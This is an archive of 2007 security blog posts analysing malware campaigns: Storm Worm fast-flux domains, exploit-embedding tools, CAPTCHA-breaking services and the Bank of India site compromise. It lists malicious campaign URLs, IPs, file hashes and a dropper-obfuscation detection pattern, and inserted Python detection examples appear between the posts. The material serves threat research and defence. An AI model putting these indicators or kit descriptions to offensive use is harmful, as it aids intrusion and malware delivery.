Exploit Prevention Labs' recent stats on common vulnerabilities used as an infection vector can come in very handy in terms of demonstrating the mass use of these malware kits. The bottom line is that their modularity, combined with features and add-ons available either through a purchase or on demand, is an emerging trend by itself, one where you cannot tell whether it's a script kiddie or a sophisticated malicious party you're dealing with. And even if it's the latter, the KISS principle has its own ugly applicability in the malware world.

Infecting Terrorist Suspects with Malware

September 06, 2007
As we've already seen in the past, cyber jihadists, thus wannabe terrorists, use commercial anti virus, anti spyware and anonymity software. Therefore, if law enforcement starts benchmarking its creations against the most popular anti virus software, and purchasing private malware crypters to obfuscate the binaries, who would security vendors be protecting you from: law enforcement, or Yuri and Andrei, the fictional characters of two botnet masters? The practice is nothing new when it comes to intelligence gathering and the concept of OSINT through malware, for instance. What's new is its applicability to law enforcement, which in combination with bureaucracy could mean a law, in typical Chinese censorship-enforcement fashion, obliging security vendors in the country to ignore the malware if they want to continue doing business there. Could we perhaps also witness a collective bargaining effort from security vendors not to do this, given the interest in using malware against potential suspects, a largely open topic by itself? Germany floats Trojan for terror suspects:

"Would-be terrorists need only use Ubuntu Linux to avoid the ploy. And even if they stuck with Windows their anti-virus software might detect the malware. Anti-virus firms that accede to law enforcement demands to turn a blind eye to state-sanctioned malware risk undermining trust in their software, as similar experience in the US has shown. Once the malware gets into circulation there's no guarantee it won't be turned against innocent users. The whole concept is loaded with irony. For one thing, German government computers, like those in the UK before them, are currently under targeted Trojan assault."

Targeted mailings to potential terrorists wouldn't work as effectively as embedding IFRAMEs within the cyber jihadist communities, and in the future we may also see anti-terrorist malware kits courtesy of an unknown government purchasing or bidding for zero day browser vulnerabilities, or anti virus software ones, in order to infect potential terrorists by bypassing the security solutions they have in place.

Examples of Search Engine Spam

September 05, 2007
Perhaps I should say an example of 50/50 black hat SEO, as Google's not listing the first, but has already crawled the second: cashhomes.info/content ; mydream-condos.info/content. While assessing the first link farm I found out that its 263 pages contain exactly 6411 outbound links, 24.3 links per page on average. Pretty much the same case with the second one. Owning hundreds of domains like these and feeding them with garbage content in between syndicating ads can undermine a search engine's credibility if the black hat SEO operation starts appearing at the top of the results, and as we've already seen, both black hat SEO and paid keyword advertising can lead to malware embedded sites.

Storm Worm's Fast Flux Networks

September 05, 2007
Following my previous posts on "Storm Worm Malware Back in the Game" and "Storm Worm's use of Dropped Domains", here are some handy graphs of Storm Worm's use of fast-flux networks, generated during the last several hours and acting as great examples of how diverse malware C&C has become.

- bnably.com

Domain servers in listed order:
ns13.bnably.com
ns12.bnably.com
ns11.bnably.com
ns10.bnably.com
ns9.bnably.com
ns8.bnably.com
ns7.bnably.com
ns6.bnably.com
ns5.bnably.com
ns4.bnably.com
ns3.bnably.com
ns2.bnably.com
- wxtaste.com

Domain servers in listed order:
ns13.wxtaste.com
ns12.wxtaste.com
ns11.wxtaste.com
ns10.wxtaste.com
ns9.wxtaste.com
ns8.wxtaste.com
ns7.wxtaste.com
ns6.wxtaste.com
ns5.wxtaste.com
ns4.wxtaste.com
ns3.wxtaste.com
ns2.wxtaste.com
- snbane.com

Domain servers in listed order:
ns13.snbane.com
ns12.snbane.com
ns11.snbane.com
ns10.snbane.com
ns9.snbane.com
ns8.snbane.com
ns7.snbane.com
ns6.snbane.com
ns5.snbane.com
ns4.snbane.com
ns3.snbane.com
ns2.snbane.com

- tibeam.com

Domain servers in listed order:
ns13.tibeam.com
ns12.tibeam.com
ns11.tibeam.com
ns10.tibeam.com
ns9.tibeam.com
ns8.tibeam.com
ns7.tibeam.com
ns6.tibeam.com
ns5.tibeam.com
ns4.tibeam.com
ns3.tibeam.com
ns2.tibeam.com
- eqcorn.com

Domain servers in listed order:
ns10.eqcorn.com
ns11.eqcorn.com
ns12.eqcorn.com
ns13.eqcorn.com
ns2.eqcorn.com
ns3.eqcorn.com
ns4.eqcorn.com
ns5.eqcorn.com
ns6.eqcorn.com
ns7.eqcorn.com
ns8.eqcorn.com
ns9.eqcorn.com

The Honeynet Project & Research Alliance defines a fast-flux network as:

"Fast-flux service networks are a network of compromised computer systems with public DNS records that are constantly changing, in some cases every few minutes. These constantly changing architectures make it much more difficult to track down criminal activities and shut down their operations."

In Storm Worm's case, we have an example of fast-fluxing dropped domains, and if you research a little further, you'll see that the newly infected Storm Worm hosts shown at this particular moment of the flux are already sending out spam.
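What the name server lists above show only for one moment is the churn of A records across repeated lookups, which is what the Honeynet definition turns on. Here is an added example, not code from the post, of scoring a domain for fast-flux behaviour from a series of resolution snapshots. The snapshots are constructed (documentation-range addresses, not Storm Worm data), the /24 prefix stands in for an ASN lookup you would normally do, and the thresholds are assumptions to tune against your own resolver data; `collect_snapshots` takes an injected resolver so the gathering loop can be run with any DNS library.

```python
from ipaddress import ip_address, ip_network
from statistics import mean

# Constructed resolution snapshots: (seconds since start, TTL, [A records]).
SNAPSHOTS_FLUX = [
    (0,   300, ["192.0.2.10", "198.51.100.23", "203.0.113.77", "192.0.2.200"]),
    (300, 300, ["198.51.100.90", "203.0.113.4", "192.0.2.10", "198.51.100.150"]),
    (600, 300, ["203.0.113.250", "192.0.2.33", "198.51.100.23", "203.0.113.99"]),
    (900, 300, ["192.0.2.140", "198.51.100.7", "203.0.113.8", "192.0.2.61"]),
]
SNAPSHOTS_STATIC = [
    (0,   86400, ["192.0.2.10"]),
    (300, 86400, ["192.0.2.10"]),
    (600, 86400, ["192.0.2.10"]),
]

def flux_features(snapshots):
    """Summarize how a domain's A records behaved across repeated lookups."""
    seen, nets = set(), set()
    churn = 0                       # addresses first seen after the initial lookup
    for _, ttl, addrs in snapshots:
        cur = set(addrs)
        if seen:
            churn += len(cur - seen)
        seen |= cur
        for a in addrs:
            # /24 as a cheap stand-in for "different network"; use ASN data if you have it
            nets.add(ip_network(ip_address(a).exploded + "/24", strict=False))
    span = snapshots[-1][0] - snapshots[0][0] if len(snapshots) > 1 else 0
    return {
        "unique_ips": len(seen),
        "unique_24s": len(nets),
        "churn": churn,
        "avg_ttl": mean(ttl for _, ttl, _ in snapshots),
        "span_seconds": span,
    }

def is_fast_flux(snapshots, max_ttl=1800, min_unique_ips=8, min_nets=3):
    """Heuristic: short TTLs, many distinct addresses spread over several networks,
    and new ones keep appearing. Thresholds are assumptions, not published cut-offs."""
    f = flux_features(snapshots)
    return (f["avg_ttl"] <= max_ttl and f["unique_ips"] >= min_unique_ips
            and f["unique_24s"] >= min_nets and f["churn"] > 0)

def collect_snapshots(domain, rounds, interval, resolve):
    """Gather live snapshots; resolve(domain) -> (ttl, [ips]) is supplied by the caller."""
    import time
    out = []
    for i in range(rounds):
        ttl, ips = resolve(domain)
        out.append((i * interval, ttl, ips))
        if i + 1 < rounds:
            time.sleep(interval)
    return out

if __name__ == "__main__":
    for name, snaps in (("flux", SNAPSHOTS_FLUX), ("static", SNAPSHOTS_STATIC)):
        print(name, flux_features(snaps), "fast-flux" if is_fast_flux(snaps) else "stable")
```

Query the domain at least as often as its TTL for an hour or so before trusting the verdict; a content delivery network also rotates addresses, but it does so with a handful of provider-owned prefixes rather than the residential address sprawl a Storm Worm domain produces.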

Login Details for Foreign Embassies in the Wild

September 04, 2007
Login details for international embassies have been in the wild since August 30th, full-disclosure style:

"Here is a list with working passwords to exactly 100 email-accounts to Embassies and Governments around the world. Yes it’s the real deal and still working when we are posting this. So why in the world would anyone publish this kind of information? Because seriously, I’m not going to call the president of Iran and tell him that I got access to all their embassies. I’m DEranged, not suicidal! He has bombs and stuff…"

The researcher's main motivation for releasing these is that there's no point in contacting the email owners directly, as no one would take his emails seriously enough to change the passwords, so going full disclosure would prompt the embassies in question to change them. Dan Egerstad may be quite right, at least on the password changing issue. Could these email accounts be accessed globally, and if so, why? For instance, could Uzbekistan's embassy in London successfully log in to Uzbekistan's embassy in Moscow, and even worse, could a host not belonging to the embassy's network access these mailboxes, for flexibility? If yes, there are way too many ways this data could have been obtained. While going through the account data, we can both confirm that best practices for strong passwords are in place at some embassies, and also question the lack of such best practices at certain others; it's a security measure that works against brute forcing attempts, but is totally irrelevant when it comes to keylogging and sniffing.

Many people would logically consider the possibility of abusing these login details by obtaining the content of the mailboxes. However, another perspective worth keeping in mind is the use of this login data as the foundation for targeted attacks on an embassy-to-embassy basis, the way we've seen it happen before.

DIY Exploits Embedding Tools - a Retrospective

September 04, 2007
Great analysis by the Spywareguide folks -- Chris Boyd and Peter Jayaraj in this assessment -- especially my deja vu moment with the King's IE Exploiter tool, which I intended to cover in an upcoming post, in combination with a brief retrospective of the exploit and malware embedding tools that empowered entire generations of script kiddies during the last couple of years. These tools are a great example of what the DIY trend used to look like before malicious economies of scale were embraced in the form of today's modular and efficiency-centered malware kits.

-- The IE Exploiter v1.0/2.0

The tool is first known to have emerged back in 2002, with its latest version released in 2004. It was first branded as the "Fearless IE Exploiter" and then returned to its original name. Description of v1.0: "Fearless IE Exploiter allows you to embed executable files into HTML documents, that when viewed in an unpatched version of Internet Explorer 5.* will automatically download and execute the .exe". And the description of v2.0: "IE Exploiter v2 is a very simple tool that creates a HTML file with an embedded executable file. Once the HTML file is viewed the executable file will overwrite notepad.exe on the target system and then execute it using the view-source: prefix."

Result: 22/32 (68.75%)
File size: 149359 bytes
MD5: 315cd35aa5a0334697832e83fac7b0dc
SHA1: 71a7929f7781d969a63e532cd8cd877940a2ca12

-- King's IE Exploiter

King's IE Exploiter is an Arabic DIY exploit embedding tool released around 2004. Although the malware-embedded pages it generates on the fly are completely unobfuscated, it remains to be seen whether such a feature will eventually be released.

Result: 6/32 (18.75%)
File size: 253440 bytes
MD5: e6052d3abf95429fd761feef0a695470
SHA1: 9f91e21bf9e8898a09c36b31bb1f5afff3cb8f35

-- Zephyrus

Again released around 2004, the description reads: "Its a prove of concept tool to generate a Stench MediaPlayer Exploit file more infos about stench can be found here http://malware.com or at here AVP calls it exploit.win32.zephyrus"

Result: 30/32 (93.75%)

-- God's Will

The description reads: "A GODMESSAGE page is an HTML page that works with an ACTIVEX bug founded in IE5.5/OUTLOOK/OUTLOOK EXPRESS. Thanks to this bug when someone view our godmessaged page he downloads an HTA file in his STARTUP FOLDER."

Result: 32/32 (100%)

-- Ed Html Infector

The description of the tool, circa 2004, reads: "Ed HTML Infector is a very simple tool that creates HTML file with an embedded executable file within."

Result: 14/32 (43.75%)
File size: 118784 bytes
MD5: 94c642903318f89d410c64d46f2047aa
SHA1: b834cd34283e541dccb5aad81fb49ca97adbb48c

Spammers and Phishers Breaking CAPTCHAs

September 03, 2007
The emergence of CAPTCHA based authentication was a logical move in the fight against automated brute forcing of login details, automated registrations, spamming and splogging in the form of comments and splog registration. Consequently, spammers, phishers and malware authors started figuring out how to achieve their objectives automatically, by either breaking or adapting to a certain CAPTCHA, or, even more pragmatically, by outsourcing the task to a third party.

Two months ago, there were news stories on how spammers and phishers, feeling the pressure put on them by anti-spam vendors, had supposedly broken Hotmail's and Yahoo's CAPTCHAs. Nothing is impossible, the impossible just takes a little longer; what's important is discussing the many other perspectives related to adapting to a CAPTCHA, directly breaking it, or entirely ignoring it.


In the first example you can see automatic CAPTCHA recognition at a Russian email provider. What the script is doing is basically syndicating proxies, ensuring they work, and starting the mass registration process while reporting confirmation or error results in between. The CAPTCHA in question is indeed primitive, but the email provider's clean IP reputation and its usefulness as a launch pad for spam, phishing and malware are what the malicious parties are really interested in. Once the CAPTCHA becomes easily recognizable, the entire process of logging in and sending the malicious content can also be fully automated.

In the second example you can see a great example of the adaptation process. The CAPTCHA cannot be efficiently abused as we've seen in the first case, but instead of putting effort into breaking it directly, the malicious parties are simply adapting. Once proxies get syndicated and verified for connectivity, the script asks for the number of accounts to be registered, responds with automatically generated logins, and presents each CAPTCHA to be entered manually by the malicious party. Malicious economies of scale in action: even though the CAPTCHA cannot be broken, the process is still partly automated, another example of marginal thinking applied in order to achieve an objective.

Sample CAPTCHA breaking project requests:

- "I need a captcha breaker that can break captchas that are of the same style i will upload here. I will want a c++ dll that receives a file path and returns a char* with the content of the picture (letters and numbers)"

- "The program needs to take a myspace captcha image and determine what the text says in the image. The accuracy needs to be 80%+"

- "We are an expert group for inputting captcha for you with very low price and high accuracy. We can input 10k to 100k (depending on how many you can offer to us) per day with accuracy at least 70% (for simple captcha such as yahoo, it is above 95%). We also own expert programmers who can help you with writing your spiders or other software to get and manage all the captchas."

Some are purely malicious, others aim to verify the security of a CAPTCHA under development, for instance. Let's summarize: why are malicious parties interested in defeating CAPTCHAs at popular sites?

- take advantage of the clear IP reputation of the email service in order to improve the chance of having their phishing/spam/malware email successfully received

- set the foundations for a large scale automated spamming/phishing operations by using legitimate email addresses, thus improving their chances of not getting filtered

- automated registration of splogs -- spam blogs

- as search engines are starting to crawl sites submitted at the most popular social networks in real time, spammers or malware authors are naturally interested in abusing this development to attract huge audiences to their splogs in a timely manner, splogs which often have malware embedded within

What are malicious parties doing to achieve efficiency despite their inability to defeat an advanced CAPTCHA?

- humans entering the CAPTCHAs while the script auto-generates and stores the credentials and automatically logs in with the passwords in combination with the human-entered CAPTCHA

- adapting rather than putting more effort into rocket science: whenever a CAPTCHA cannot be beaten automatically, as you already saw in the second screenshot, they make it easier and faster for humans to enter the CAPTCHA compared to an end user browsing the site

- outsourcing the work while presenting it as a quality assurance project for a CAPTCHA about to be introduced on the market

What can web sites do to prevent that sort of malicious behaviour? Strong CAPTCHAs should be in place by default, but taking another perspective, the way I discussed how click fraud could be easily detected by advertising networks syndicating the IPs of hosts already known to be malware infected, in this very same fashion we could have a CAPTCHA system that checks whether, for instance, default proxy ports are open on the host trying to register, and whether or not it is part of a botnet. With data like this now a commodity, a prioritization process that closely monitors mass registrations from these IPs is a pragmatic early warning system.

Interesting reading on the big picture too, CAPTCHA - The Broken Token:

"How much does it cost to have a CAPTCHA hack custom developed? $10 to $20 ought to do the trick; certainly no more than $50. But the cost isn’t the point. What’s more alarming is that thousands upon thousands of site owners are depending upon flawed technology to protect their sites from spam even though they know, or at least should know, that it’s only a matter of time until some spam robot shows up and starts hammering away at those worthless little images."

The irony regarding CAPTCHAs is that less popular sites often have a more sophisticated CAPTCHA than the Web 2.0 darlings, the most widely used web sites.
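The prioritization idea above, as an added Python example that is not part of the original post: registration events are scored against a known-bot feed, previously observed open proxy ports, and a sliding-window mass-registration check, and the result is a review queue ordered by risk. All IPs, feeds, port lists and thresholds are constructed assumptions.

```python
from collections import defaultdict

# Constructed sample data (not real indicators): registration events as
# (unix timestamp, source IP, username) plus two reputation sources.
REGISTRATIONS = [
    (1000, "203.0.113.5", "user01"), (1030, "203.0.113.5", "user02"),
    (1060, "203.0.113.5", "user03"), (1090, "203.0.113.5", "user04"),
    (1200, "198.51.100.9", "alice"),
    (1300, "192.0.2.77", "bob"), (1310, "192.0.2.77", "carol"),
]
KNOWN_BOT_IPS = {"203.0.113.5"}            # e.g. from a sinkhole or botnet tracker feed
OPEN_PROXY_PORTS = {"192.0.2.77": {3128}}  # hosts previously observed with a proxy port open
DEFAULT_PROXY_PORTS = {1080, 3128, 8080}   # assumed "default proxy ports" to look for


def registration_risk(events, bot_ips, open_ports, window=300, max_per_window=3):
    """Score each source IP: +3 if it is a known bot, +2 if it exposes a default
    proxy port, +1 if it exceeds max_per_window sign-ups inside any `window` seconds."""
    by_ip = defaultdict(list)
    for ts, ip, _ in sorted(events):
        by_ip[ip].append(ts)
    scored = {}
    for ip, times in by_ip.items():
        score, reasons = 0, []
        if ip in bot_ips:
            score += 3
            reasons.append("known-bot")
        if open_ports.get(ip, set()) & DEFAULT_PROXY_PORTS:
            score += 2
            reasons.append("open-proxy-port")
        lo = 0  # sliding window over the sorted timestamps
        for hi in range(len(times)):
            while times[hi] - times[lo] > window:
                lo += 1
            if hi - lo + 1 > max_per_window:
                score += 1
                reasons.append("mass-registration")
                break
        scored[ip] = (score, reasons)
    return scored


def review_queue(scored):
    """Source IPs ordered by descending risk; zero-score IPs are left out."""
    ranked = sorted(scored.items(), key=lambda kv: -kv[1][0])
    return [ip for ip, (score, _) in ranked if score > 0]


if __name__ == "__main__":
    scores = registration_risk(REGISTRATIONS, KNOWN_BOT_IPS, OPEN_PROXY_PORTS)
    for ip in review_queue(scores):
        print(ip, scores[ip])
```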


Bank of India Serving Malware

August 31, 2007
Ryan at ZDNet's Security blog is reporting on the breached site of Bank of India, which at the time of writing is still serving malware to its current and potential customers through the infamous Russian Business Network - 81.95.144.0 / 81.95.147.255.

At the bank's URL there's a link pointing to goodtraff.biz (58.65.239.66), where an IFRAME loads 81.95.144.148/in.cgi?10; accessing it, the response comes from 81.95.144.146, with the usual javascript obfuscation leading us to 81.95.144.146/at/index.php and 81.95.144.146/rut/index.php. Furthermore, a second IFRAME leads to x-traffic.biz/ts/in.cgi?user0224 (a Russian adult traffic network), redirecting to mymoonsite.net/check/version.php?t=167 (81.95.148.13), and a third one loads goodtraff.biz/tds/index.php (empty). What does it mean? It means the Russian Business Network has not just managed to inject its presence on Bank of India's site, but is also using multiple IFRAMEs as an attack vector, thus creating a fast-flux network carrying multiple campaigns, which I'll assess in this post.

Apparently, Trend Micro has been busy uncovering the n404 exploit kit, which is also used in this campaign aimed at the Bank of India. Is this a newly developed attack kit, or a modification of another popular one? Further attack clues will definitely indicate the second, namely that it's a modification. This kit returns a 404 error page within which the obfuscated javascript is embedded, so we have a fast-flux oriented kit aiming to diversify and include as many infected nodes in the attack process as possible, improving its chances of infecting the host while the campaign remains intact. The malicious URL structure is again static, just like Storm Worm's, and is in the following format: n404-(number from 1 to 9).htm, where each page contains a different piece of malware.

Several more n404 exploit kit campaigns are currently active at the following URLs:

msiesettings.com - 81.95.148.14
winmplayer.com
smoothdns.net - 81.95.148.12
protriochki.com - 81.95.148.14
susliksuka.com - 81.95.148.12
uspocketpc.com - 81.95.148.13

The exact campaign URLs, all served under each domain's /check/ path with the n404 naming pattern described above:

What makes an impression is that it's relying on as many malware infections as possible: visiting a central campaign site such as mymoonsite.net/check/version.php?t=158 results in all the n404 malicious pages within the domain getting automatically loaded via an IFRAME, and, as you've successfully guessed, they all contain different types of malware. Although javascript obfuscation is often used to hide the real location of the exploit or binary, in this campaign each and every n404-1.htm obtained from all the domains has the same checksum, therefore the files at the different domains are identical - at least so far:

File size: 10636 bytes
MD5: 45594ef52a9f53f2140d4797826156ff
SHA1: 7c4f7d183dfaf39410902a629b13ae5112b847f0

AntiVir 2007.08.31 HTML/Crypted.Gen
eSafe 2007.08.29 JS.Agent.ke
Fortinet 2007.08.31 HTML/Heuri.BIU!tr.dldr
F-Secure 2007.08.31 Trojan-Downloader.JS.Agent.no
Kaspersky 2007.08.31 Trojan-Downloader.JS.Agent.no
Webwasher-Gateway 2007.08.31 Script.Crypted.Gen
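The two observations above, obfuscated script hidden inside a 404 response and identical pages across many domains, as an added Python detection example that is not part of the original post: each captured response is checked for a 404 status carrying script with obfuscation markers, and the hits are grouped by body hash so identical kit pages served from different domains fall together. The URLs, bodies and marker list are constructed assumptions, not the campaign's real content.

```python
import hashlib
import re
from collections import defaultdict

# Constructed captured responses (hosts and bodies invented for illustration):
# (url, HTTP status, body)
RESPONSES = [
    ("http://kit-a.example/check/n404-1.htm", 404,
     "<html><body>404 Not Found<script>document.write(unescape("
     "'%3C%69%66%72%61%6D%65'+'%20%73%72%63%3D'));eval(x)</script></body></html>"),
    ("http://kit-b.example/check/n404-1.htm", 404,
     "<html><body>404 Not Found<script>document.write(unescape("
     "'%3C%69%66%72%61%6D%65'+'%20%73%72%63%3D'));eval(x)</script></body></html>"),
    ("http://shop.example/missing", 404,
     "<html><body><h1>404 Not Found</h1></body></html>"),
    ("http://blog.example/post", 200,
     "<html><body><script>var a=1;</script></body></html>"),
]

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
# Assumed markers typical of obfuscated droppers; tune for your own traffic.
OBFUSCATION_MARKERS = ("unescape(", "eval(", "fromCharCode", "document.write(")
PERCENT_RUN_RE = re.compile(r"(?:%[0-9a-fA-F]{2}){6,}")  # 6+ consecutive %XX bytes


def obfuscation_hits(body):
    """Count obfuscation markers and long percent-encoded runs inside <script> blocks."""
    hits = 0
    for script in SCRIPT_RE.findall(body):
        hits += sum(script.count(marker) for marker in OBFUSCATION_MARKERS)
        hits += len(PERCENT_RUN_RE.findall(script))
    return hits


def find_n404_pages(responses, min_hits=2):
    """Return {sha1(body): [urls]} for 404 responses that smuggle obfuscated script,
    so identical kit pages served from several domains are grouped together."""
    groups = defaultdict(list)
    for url, status, body in responses:
        if status == 404 and obfuscation_hits(body) >= min_hits:
            groups[hashlib.sha1(body.encode()).hexdigest()].append(url)
    return dict(groups)


if __name__ == "__main__":
    for digest, urls in find_n404_pages(RESPONSES).items():
        print(digest, len(urls), "identical page(s):", ", ".join(urls))
```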

A great example of a fast-flux network with way too many infected hosts participating in the attack; even though some seem to be down, the attack is still fully operational in typical fast-flux style.

UPDATE: F-Secure's and McAfee's comments on the case, as well as two related posts - Bank of India’s Website has been Compromised by Trojan downloader; Bank of India Official Web Site Unsafe at the Moment.

UPDATE 2:
Several hours after the Bank of India got rid of the iframe at its homepage, the main URL for this malware campaign (81.95.144.148/in.cgi?10) removed the javascript obfuscation and is now forwarding to Google.com.

"We have taken up the matter with our technology-partner and all necessary action will be taken to rectify the matter. In my view, the users will not be faced with any major problems," said BoI general manager PA Kalyansundar. "However, we are not completely sure that an attack actually happened," he clarified.

Here's another article from The Register mentioning the three key points related to the campaign - the Russian Business Network, the n404 exploit kit which is definitely a modification of the popular ones currently in the wild, and the use of fast-flux networks. And this is what happened when an Indian tried to reach the local Cybercrime unit.

Malware as a Web Service

August 31, 2007
Popular malware tools such as binders and downloaders usually come in the form of a typical software application. Moreover, when I talk about malware services I mean crypting, packing and limiting the detection rate on demand, while in this case we have DIY malware as a web service. Whether this is a trend to come or a fad that will disappear, only time will show, but the possibilities for porting popular malware tools into web service form are quite disturbing.

In the first example we have a malware downloader as a web service with various configurable variables, such as the custom port and IP to obtain the payload from, as well as the ability to modify how the payload is extracted and executed. Combined with the option to choose a packer, to decide whether or not to melt the downloader after it delivers the payload, and to choose from a set of predefined icons or select a custom one, this makes the malware web service an interesting one to monitor.

A sample of the first service:

Result: 5/32 (15.63%)
BitDefender 2007.08.31 Generic.Malware.Fdld!.D8E4DF1F
eSafe 2007.08.29 suspicious Trojan/Worm
NOD32v2 2007.08.30 probably unknown NewHeur_PE virus
Sophos 2007.08.30 Mal/Heuri-D
Webwasher-Gateway 2007.08.30 Trojan.Downloader.Win32.ModifiedUPX.gen (suspicious)

File size: 11776 bytes
MD5: e9df373f1561bed2a2899707869a7a44
SHA1: 295c6702cb19f6b20720057d61d940921602a0cd

In the second example, we have a malware binder as a web service with pretty much identical features to the first example. If traders of malware services such as the above mentioned crypting, packing and ensuring a lower detection rate start embracing Web 2.0 in the process of efficiently constructing malware, or providing their customers with a DIY experience by constantly keeping their "web dashboard" up to date with new services and features, it can get very ugly. So, let's hope it's just a fad.